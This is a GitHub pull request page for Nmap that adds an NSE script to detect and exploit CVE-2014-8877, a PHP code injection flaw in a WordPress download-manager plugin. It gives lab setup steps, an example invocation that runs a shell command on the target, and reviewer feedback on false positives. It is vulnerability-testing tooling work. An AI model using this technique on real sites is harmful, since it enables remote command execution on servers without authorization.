Skip to content

Add script for detecting and exploiting vulnerability in Wordpress CM Do... #38

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
mzet- wants to merge 2 commits into from
Closed

Add script for detecting and exploiting vulnerability in Wordpress CM Do... #38

mzet- wants to merge 2 commits into from

Conversation

@mzet-
Copy link

@mzet- mzet- commented Jan 2, 2015

Overview

Following script detects & exploits CVE-2014-8877 vulnerability in Wordpress CM Download Manager plugin
(https://wordpress.org/plugins/cm-download-manager/). Versions <= 2.0.0 are affected.

Vulnerability allows to inject arbitrary PHP code via CMDsearch param. The script simply injects system() function with OS shell command of choice (provided as script's parameter) as an argument.

Preparing testing environment

To prepare local testing environment following steps should be performed:

  • Install latest version of Wordpress on Linux machine
  • Get vulnerable version of Wordpress CM Download Manager plugin: svn co -r 1007950 http://plugins.svn.wordpress.org/cm-download-manager/trunk/ cm-dw-manager
  • Prepare plugin for installation: find cm-dw-manager/ -type d -name .svn -print0 | xargs -0 rm -rf; zip -r cm-download-manager.zip cm-dw-manager/
  • Upload it to wp-content/plugins directory of your Wordpress installation. Unzip. Activate in admin panel.

Running the script

Running the script:
nmap -P0 -p80 -n --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",
http-vuln-cve2014-8877.uri="/wordpress"

Where 'cmd' parameter is shell command for execution and 'uri' is path to your Wordpress installation.

p-l-
p-l- reviewed Mar 26, 2015
View reviewed changes
scripts/http-vuln-cve2014-8877.nse Outdated
Copy link

@p-l- p-l- Mar 26, 2015

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You could pick a pseudo-random string, maybe with a hash of the command sent instead of ZZZ (just to avoid to miss part of the result if it includes ZZZ).

@dmiller-nmap
Copy link

dmiller-nmap commented Jun 1, 2015

@mzet- Sorry for the delay in reviewing this. Unfortunately, it has false positive problems. If the page requested echoes the request URI at all, then the check will be true, since the check is a simple echo function. Here are the changes I would like to see before we could include this:

  1. Come up with a check that is not subject to this echo problem. This could be done by base64-encoding the string and having the server use base64_decode to echo it back.
  2. Use pure PHP calls for the check function, not system. This will help keep the script cross-platform and less likely to run afoul of a WAF or other server hardening.

@mzet-
Copy link
Author

mzet- commented Sep 22, 2015

Guys,

I've finally found some time to incorporate your feedback:

  • base64 encoded string is used now,
  • PHP system() isn't used anymore for checking if site is vulnerable (is used only for invoking payload)
  • I've also got rid of 'ZZZ' strings and changed it to random strings.

@nmap-bot nmap-bot closed this in 8db897d Nov 11, 2015
qha pushed a commit to qha/nmap that referenced this pull request Dec 16, 2015
@bonsaiviking @qha
Add http-vuln-cve2014-8877. Closes nmap#38.
140d754
@fyodor fyodor mentioned this pull request Mar 1, 2021
Open
@avbeegol avbeegol mentioned this pull request Dec 15, 2023
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

enhancement have code NSE

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@mzet- @dmiller-nmap @p-l- @bonsaiviking